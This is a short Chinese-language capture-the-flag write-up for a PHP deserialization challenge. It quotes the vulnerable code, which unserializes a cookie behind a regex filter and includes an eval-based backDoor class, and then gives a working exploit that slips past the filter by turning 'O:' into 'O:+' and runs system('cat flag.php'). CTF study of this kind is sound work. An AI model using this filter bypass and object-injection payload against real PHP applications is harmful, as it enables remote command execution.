与上一题的区别就是,在最后反序化之前做了一个正则表达式
在Cookie中过滤以o或者c开头加:加任意数字最后以:结尾的不区分大小写的字符串
O:数字:
C:数字:
class ctfShowUser{
public $username='xxxxxx';
public $password='xxxxxx';
public $isVip=false;
public $class = 'info';
public function __construct(){
$this->class=new info();
}
public function login($u,$p){
return $this->username===$u&&$this->password===$p;
}
public function __destruct(){
$this->class->getInfo();
}
}
class info{
public $user='xxxxxx';
public function getInfo(){
return $this->user;
}
}
class backDoor{
public $code;
public function getInfo(){
eval($this->code);
}
}
$username=$_GET['username'];
$password=$_GET['password'];
if(isset($username) && isset($password)){
if(!preg_match('/[oc]:\d+:/i', $_COOKIE['user'])){
$user = unserialize($_COOKIE['user']);
}
$user->login($username,$password);
}
经过查看wp,因为序列化后是对象,以o开头,所以对原数据进行字符串替换,将o:替换为o:+
具体意义:猜测是因为:后跟数字,表示正数吧
#最终代码
class ctfShowUser{
public $class;
public function __construct(){
$this->class=new backDoor();
}
}
class backDoor{
public $code='system("cat flag.php");';
}
$a = serialize(new ctfShowUser());
$a = str_replace('O:','O:+',$a);
echo urlencode($a);
关于这个,比较不容易注意到的一个点就是属性的可见性要设定为public
如果还是private私有可见的话,不会取得预想效果